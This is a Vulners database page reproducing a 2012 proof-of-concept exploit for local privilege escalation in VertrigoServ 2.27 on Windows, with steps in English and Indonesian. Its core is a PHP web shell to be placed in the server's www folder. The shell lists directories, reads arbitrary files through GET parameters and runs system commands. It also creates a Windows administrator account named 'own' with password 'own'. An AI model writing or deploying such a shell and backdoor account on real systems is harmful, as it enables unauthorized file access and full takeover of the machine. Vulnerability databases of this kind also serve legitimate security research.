Vulners
Lucene search
Vertrigoserv 2.27 Privilege Escalation
`=====================================================
Vertrigoserv 2.27 Local Privilege Escalation Exploit
====================================================
:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit
: # Date : May 19th 2012
: # Author : X-Cisadane
: # Software Link : http://vertrigo.sourceforge.net/
: # Version : 2.27
: # Category : Desktop (Windows) Applications
: # Platform : Win32
: # Vulnerability : Local Privilege Escalation Exploit
: # Tested On : Windows XP Professional Service Pack 3
: # Greetz to : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai,
Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------:
Proof Of Concept :
================
[ENGLISH]
1.Run VertrigoServ
2.Create a file named script.php in X:\VertrigoServ Installation
Directory\www\
3.Fill script.php with this script & save!
<?php
//I'm using code from Inphex (inphex0 at googlemail.com)
//Copyrighted (C) Inphex
error_reporting(E_ALL ^ E_NOTICE);
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
$qQd = opendir($qQa);
if (isset($_GET['qrF']))
{
$qrX = fopen($_GET['qrF'],"r");
echo fread($qrX,50000);
exit;
} elseif(isset($_GET['qQx'])) { exec("net user own own /add & net
localgroup Administrators own /add"); echo "User own -> full privileges
successfully added";exit;}
echo "<textarea rows=40 cols=80
style='position:absolute;margin-left:390;'>";
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
echo "</textarea>";
while (false !== ($qQr = readdir($qQd))){
switch(filetype($qQa.$qQr))
{
case "dir":
echo "<a
href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
break;
case "file":
echo "<a
href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
break;
}
}
?>
4.Open your browser & go to http://localhost/script.php?qQx
5.If successfull, it will show this message : User own -> full privileges
successfully added
6.Now, open Command Prompt and type Net User then press enter! It will show
a new user (own) & the password is own.
[INDONESIAN]
1.Jalankan VertrigoServ
2.Buat sebuah berkas dengan nama script.php pada X:\Direktori tempat
menginstall VertrigoServ\www\
3.Isi berkas script.php dengan script berikut & simpan!
4.Buka browser anda, masuk ke http://localhost/script.php?qQx
5.Jika berhasil, akan muncul pesan ini User own -> full privileges
successfully added
6.Sekarang buka Command Prompt dan ketik Net User kemudian tekan enter!
Kemudian akan muncul sebuah user baru dengan nama own dan password own
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 May 2012 00:00Current
1Low risk
Vulners AI Score1